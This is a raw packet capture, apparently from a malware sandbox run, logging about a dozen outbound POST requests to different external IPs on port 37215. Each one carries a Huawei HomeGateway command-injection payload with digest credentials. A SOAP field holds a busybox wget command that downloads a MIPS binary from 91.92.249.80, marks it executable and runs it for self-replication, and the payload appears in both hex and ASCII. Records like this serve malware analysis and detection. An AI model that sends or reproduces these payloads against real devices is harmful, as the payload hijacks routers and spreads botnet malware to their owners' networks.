                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1087192.168.2.2338172157.138.10.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298860073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1088192.168.2.2354002157.230.82.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298877954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1089192.168.2.233332869.65.133.18337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298923969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1090192.168.2.236063441.20.149.6537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298923969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1091192.168.2.2357798197.218.150.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298955917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1092192.168.2.235550679.127.71.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298974991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1093192.168.2.2349724104.128.83.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298979044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1094192.168.2.2357884218.175.181.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299000025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1095192.168.2.2360166157.134.33.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299010038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1096192.168.2.233357041.79.225.18337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299032927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1097192.168.2.2344816157.30.38.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299040079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
